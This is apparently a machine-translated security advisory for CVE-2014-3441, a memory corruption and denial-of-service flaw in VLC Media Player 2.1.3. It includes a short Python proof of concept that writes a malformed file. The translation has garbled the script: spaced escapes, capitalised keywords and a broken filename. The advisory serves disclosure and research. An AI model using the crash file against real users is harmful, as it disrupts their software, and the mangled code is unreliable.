VLC Media Player '.wav 'File Memory Corruption Vulnerability

Release date:
Updated on:

Affected Systems:
VideoLAN VLC Media Player 2.1.3
Description:
--------------------------------------------------------------------------------
Bugtraq id: 67315
CVE (CAN) ID: CVE-2014-3441
 
VLC Media Player is a multimedia Player.
 
VLC Media Player 2.1.3 and other versions have the Memory Corruption Vulnerability. Attackers can exploit this vulnerability to cause DoS attacks.

Recommended reading:

Install the latest version of VLC2.0.2 on Ubuntu 12.04

How to install VLC 2.2.0 on Ubuntu 14.04
 
<* Source: Aryan Bayaninejad
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
#! /Usr/bin/python
Data =
"\ X89 \ x50 \ x4E \ x47 \ x0D \ x0A \ x1A \ x0A \ x00 \ x00 \ x00 \ x0D \ x49 \ x48 \ x44 \ x52 \ x7F \ xFF \ xFF \ x00 \ x00 \ x01 \ x02 \ x01 \ x03 \ x00 \ x00 \ x00 \ xBA \ x1B \ xD8 \ x84 \ x00 \ x00 \ x00 \ x03 \ x50 \ x4C \ x54 \ x45 \ xFF \ xA7 \ xC4 \ x1B \ xC8 \ x00 \ x00 \ x00 \ x01 \ x74 \ x52 \ x4E \ x53 \ x00 \ x40 \ xE6 \ xD8 \ x66 \ x00 \ x68 \ x92 \ x01 \ x49 \ x44 \ x41 \ x54 \ xFF \ x05 \ x3A \ x92 \ x65 \ x41 \ x71 \ x68 \ x42 \ x49 \ x45 \ x4E \ x44 \ xAE \ x42 \ x60 \ x82"
Outfile = file ("poc.wav e", 'wb ')
Outfile. write (data)
Outfile. close ()
Print "Created Poc"

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
 
VideoLAN
--------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
 
Http://www.videolan.org/